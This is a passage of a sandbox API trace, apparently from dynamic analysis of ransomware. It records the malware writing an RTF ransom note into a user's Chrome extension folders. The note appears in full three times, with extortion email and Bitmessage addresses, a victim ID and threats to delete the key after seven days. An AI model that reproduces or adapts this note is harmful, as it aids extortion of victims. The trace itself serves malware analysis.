b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.584] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.584] CloseHandle (hObject=0x2f0) returned 1 [0286.584] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0286.585] GetLastError () returned 0x2 [0286.585] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 